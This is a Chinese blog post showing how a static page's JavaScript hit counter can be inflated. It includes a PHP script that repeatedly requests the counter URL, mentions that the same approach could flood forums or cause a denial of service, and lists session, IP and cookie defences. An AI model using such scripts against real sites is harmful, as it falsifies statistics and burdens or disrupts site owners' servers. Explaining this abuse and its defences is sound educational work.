今天無意間看到一個網站，它的計數器能夠在靜態頁里更新，我想，應該是使用js來做的，打開源代碼一看，果然是：

＜div align=center＞＜SPAN class=Article_tdbgall＞作者：未知 文章來源：Meidi.Net 點擊數：＜script language=’javascript’ src=’/Article/GetHits.asp?ArticleID=759’＞＜/script＞更新時間：2005-5-27＜/SPAN＞ ＜/div＞

點擊數后面是一個asp文件去處理的，那么我打開這個文件看看：

document.write(’210’);

是吧，就是GetHists.asp文件處理ArticleID后提取結果后輸出次數：document.write(’次數’)，再靜態頁里就能夠直接引用了。

壞人終究是壞人，那么我就想，如何能夠迅速提升點擊數呢？手工刷新的話不是很類，恩，趕緊寫個PHP程序來自動的去訪問這個文件。

PHP代碼如下：

＜?php/* access_url.php */define(SUM, 1000); //需要訪問的次數define(L_TIME, 1000); //強制腳本執行的時間define(S_TIME, 1); //每次訪問之間休眠的時間$url = 'http://www.xxx.com/Article/GetHits.asp?ArticleID=759'; //需要訪問的地址set_time_limit(L_TIME);

//訪問指定URL函數knowsky.comfunction access_url($url){　if ($url==’’) return false;　$fp = fopen($url, ’r’) or exit(’Open url faild!’);　if ($fp) {while (!feof($fp)) {　$file = fgets($fp);　echo $file.'n＜p＞ ＜/p＞n';}unset($file);　}}

//進行測試for ($i=0; $i＜SUM; $i++) {　access_url($url);　sleep(S_TIME);} ?＞

運行上面的程序，那么就會連續訪問指定的URL地址，那么自然這個訪問次數就會連續增加，達到灌水的效果。如果是流量大，而且用多程序去運行的話，那么很容易就會達到拒絕服務（DoS）的效果了。如果對方的防范措施，把代碼修改一下針對論壇進行提交，很容易實現論壇灌水的效果。

防范方法：

1. 代碼中使用Session機制，當用戶提交的時候生成一個Session ID，提交內容的時候判斷是否已經提交，如果已提交那么就不允許刷。

2. 當用戶提交以后記錄用戶的IP地址，如果指定時間內再提交的話就不允許再提交。

3. 當用戶提交內容以后，在用戶客戶端寫入Cookie，如果用戶再次提交先檢查客戶端是否有Cookie來確定是否允許提交。

還有很多其他方法，可以去搜索一下，或者發揮自己的想象力，做的更好。